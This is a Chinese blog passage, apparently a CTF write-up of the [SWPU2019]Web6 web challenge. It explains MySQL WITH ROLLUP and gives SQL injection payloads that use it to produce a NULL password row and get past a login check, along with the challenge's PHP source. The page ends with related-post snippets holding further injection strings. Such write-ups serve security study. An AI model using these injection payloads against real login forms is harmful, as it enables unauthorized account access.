[SWPU2019]Web6

最新推荐文章于 2023-06-21 15:24:31 发布
最新推荐文章于 2023-06-21 15:24:31 发布
阅读量715 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lllffg/article/details/114899739
版权

[SWPU2019]Web6

一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测

看了下wp

猜测源码太狠了

$sql="select * from users where username='$name' and passwd='$pass'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) {
    
    $key = mysql_fetch_array($query);
    if($key['passwd'] == $_POST['passwd']) {

先了解下with rollup:Mysql中的WITH ROLLUP用法

WITH ROLLUP:在group分组字段的基础上再进行统计数据

group by…with rollup学习实例

mysql> select name,money from test;
+-----------+-------+
| name      | money |
+-----------+-------+
| 周伯通    |    12 |
| 老顽童    |    33 |
| 欧阳锋    |    70 |
| 欧阳克    |    99 |
| 小顽童    |    12 |
| 周伯通    |    56 |
| 周伯通    |    19 |
| 欧阳锋    |    57 |
| 老顽童    |    84 |
+-----------+-------+


mysql> SELECT name,money FROM test group by name,money;
+-----------+-------+
| name      | money |
+-----------+-------+
| 周伯通    |    12 |
| 周伯通    |    19 |
| 周伯通    |    56 |
| 小顽童    |    12 |
| 欧阳克    |    99 |
| 欧阳锋    |    57 |
| 欧阳锋    |    70 |
| 老顽童    |    33 |
| 老顽童    |    84 |
+-----------+-------+

mysql> SELECT name,money FROM test group by name,money with ROLLUP;
+-----------+-------+
| name      | money |
+-----------+-------+
| 周伯通    |    12 |
| 周伯通    |    19 |
| 周伯通    |    56 |
| 周伯通    |  NULL |
| 小顽童    |    12 |
| 小顽童    |  NULL |
| 欧阳克    |    99 |
| 欧阳克    |  NULL |
| 欧阳锋    |    57 |
| 欧阳锋    |    70 |
| 欧阳锋    |  NULL |
| 老顽童    |    33 |
| 老顽童    |    84 |
| 老顽童    |  NULL |
| NULL      |  NULL |
+-----------+-------+

可以看到最后汇总出来的是一个NULL,然后在看这个句源码if($key['passwd'] == $_POST['passwd']),NULL==NULL是可以过掉的

mysql> SELECT name,money FROM test group by name,money with ROLLUP limit 14,1;
+------+-------+
| name | money |
+------+-------+
| NULL |  NULL |
+------+-------+

只要找到NULL所在的位置就可以利用这个弱类型

1' or '1'='1' group by passwd with rollup limit 1,1#

正常来说这么慢慢找就可以了,但是limit被过滤了…

1' or '1'='1' group by passwd with rollup having passwd is NULL#

这样可以直接查为NULL的字段

在这里插入图片描述

wp说有提示…但是我一直没找到,访问wsdl.php打开F12有后续的提示

在这里插入图片描述

这样可以拿到源码,然后包含了2个文件进来,service.php没读权限

<?php
ob_start();
include ("encode.php");
include("Service.php");
//error_reporting(0);
//phpinfo();
$method = $_GET['method']?$_GET['method']:'index';
//echo 1231;
$allow_method = array("File_read","login","index","hint","user","get_flag");
if(!in_array($method,$allow_method)){
   
    die("not allow method");
}
if($method==="File_read"){
   
    $param =$_POST['filename'];
    $param2=null;
}else{
   
    if($method==="login"){
   
        $param=$_POST['username'];
        $param2 = $_POST['passwd'];
    }else{
   
        echo "method can use";
    }
}
echo $method;
$newclass = new Service();
echo $newclass->$method($param,$param2);
ob_flush();
?>

这里有一个method数组,根据下文和网站功能来看,这些参数应该是方法名,我们直接去调用get_flag

在这里插入图片描述

只能127.0.0.1才能调用

#encode.php
<?php
function en_crypt($content,
最低0.47元/天 解锁文章
N0Tai1学习又咕了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[SWPU2019]Web1
Sk1y的博客
06-12 476
考查点:无列名注入,mysql.innodb_table_stats
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
最新发布
01-31
仅作备份
swpu前端实验4的实验
04-23
swpu
swpu考试系统
07-01
swpu考试系统,内部的系统
SWPU2019 Network
pondzhang的专栏
07-08 786
f = open("attachment.txt","r") s = '' tmp = '' while 1: num = f.readline() if not num: break if num.rstrip() == '63': tmp = '00' elif num.rstrip() == '127': tmp = '01' elif num.rstrip() == '191': tmp = '.
动态调试——[SWPU2019]ReverseMe
热门推荐
sid10t.
07-10 3万+
文章目录声明题目分析 声明 1)该文章部分借鉴于[BUUCTF]Reverse——[SWPU2019]ReverseMe。 2)博主是萌新上路,文中如有不当之处,请各位大佬指出,共同进步,谢谢。   题目 题目链接:ReverseMe 分析 查壳, 无壳,扔进ida, int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ecx int *v4; // eax int v5; /
NSSCTF MOBILE [SWPU 2019]easyapp 详细题解
OrientalGlass的博客
06-21 815
大佬题解[SWPU 2019]easyapp pwjcw的WriteUp大佬的题解很简单,直接hook就可以看到返回值,但是我看了半天没看明白是用什么工具做的看其他题解是分析so文件得到答案,但是仍然没有搞清楚函数调用流程.后来我学习了一下**《安卓Frida逆向与抓包实战 (陈佳林)》**才知道是用frida和objection进行hook,不过仍然没有成功复现,这里推测是由于安卓版本的问题,低版本(安卓7)成功复现,安卓9及以上均会失败。
SWPUCTF2019web题复现
bmth666的博客
04-05 1179
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
[De1CTF 2019]ShellShellShell复现
lllffg的博客
02-18 460
[De1CTF 2019]ShellShellShell 这里是一个md5截断,直接拿脚本跑一下即可 # -*- coding: utf-8 -*- #在python2环境下执行python2 1.py '94d20' 0即可执行 import multiprocessing import hashlib import random import string import sys CHARS = string.letters + string.digits def cmp_md5(substr,
SpringMVC学习开篇
lllffg的博客
07-19 161
前言 挖了一段时间的tp和tp二开,差不多对php的框架有了一定了解,现在准备把Java审计的部分也开一下来拓展一下自己的审计面,当然想挖Java肯定不能像php一样,首先还是学一下SpringMVC来熟悉一下 Spring框架概述 安装:https://blog.csdn.net/u011976388/article/details/80356808 Spring是轻量级的开源JavaEE框架(类似于php的Thinkphp和laravel吧) 解决企业应用开发的复杂性 Spring特点: 1
BUUCTF:[SWPU2019]Web4
末初的CSDN博客
03-30 2705
[SWPU2019]Web4 参考:https://www.anquanke.com/post/id/194640#h3-4 题目只有一个登录框,输入账号密码后点击登陆页面无任何相应,注册功能也是尚未开放。查看源代码可以看到一个js文件,F12也可以看到一个网络请求。 js主要功能是将username和password以json格式然后发给index.php?r=Login/Login。 不难发...
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值